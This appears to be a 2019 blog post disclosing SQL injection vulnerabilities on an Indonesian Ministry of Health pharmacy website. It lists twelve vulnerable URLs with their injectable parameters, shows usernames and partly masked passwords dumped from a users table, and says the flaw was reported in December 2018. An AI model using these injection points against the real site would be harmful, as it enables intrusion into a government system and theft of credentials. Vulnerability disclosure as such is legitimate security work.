Thursday, January 31, 2019

BUGS http://apif.binfar.depkes.go.id

Domain : http://apif.binfar.depkes.go.id
Vuln : SQL Injection
Risk Level : HIGH


SQL Injection:
| [+] Vul [SQL-i] http://apif.binfar.depkes.go.id/?req=view_news&p=news&per_page=3'              
           
| [+] Vul [SQL-i] http://apif.binfar.depkes.go.id/index.php?req=view_search&p=pemetaanIndustriFarmasi              
| Post data: &propinsi=123'

| [+] Vul [SQL-i] http://apif.binfar.depkes.go.id/index.php?req=view_search&p=pemetaan              
| Post data: &propinsi=123'&kabupaten=123&category=123  

| [+] Vul [SQL-i] http://apif.binfar.depkes.go.id/index.php?req=view_search&p=pemetaanApotek              
| Post data: &propinsi=123'

| [+] Vul [SQL-i] http://apif.binfar.depkes.go.id/index.php?req=view_search&p=pemetaanPBF              
| Post data: &propinsi=123'  

| [+] Vul [SQL-i] http://apif.binfar.depkes.go.id/index.php?req=view_search&p=pemetaanKosmetika              
| Post data: &propinsi=123'  

| [+] Vul [SQL-i] http://apif.binfar.depkes.go.id/index.php?req=view_search&p=pemetaanIkot              
| Post data: &propinsi=123'

| [+] Vul [SQL-i] http://apif.binfar.depkes.go.id/index.php?req=view_search&p=pemetaanTokoobat              
| Post data: &propinsi=123'

| [+] Vul [SQL-i] http://apif.binfar.depkes.go.id/index.php?req=view_search&p=pemetaanPBBBF              
| Post data: &propinsi=123'

| [+] Vul [SQL-i] http://apif.binfar.depkes.go.id/index.php?req=view_search&p=pemetaanIot              
| Post data: &propinsi=123'  

| [+] Vul [SQL-i] http://apif.binfar.depkes.go.id/index.php?req=view_search&p=pemetaantokoalkes              
| Post data: &propinsi=123'  

| [+] Vul [SQL-i] http://apif.binfar.depkes.go.id/index.php?req=view_search&p=pemetaanindustri_rtpangan              
| Post data: &propinsi=123'

Database: pemetaan
Table: users
[2 entries]
adminapif : apif******
baguz : admin******


---
Telah dilaporkan pada tangal 27 Desember 2018.

No comments: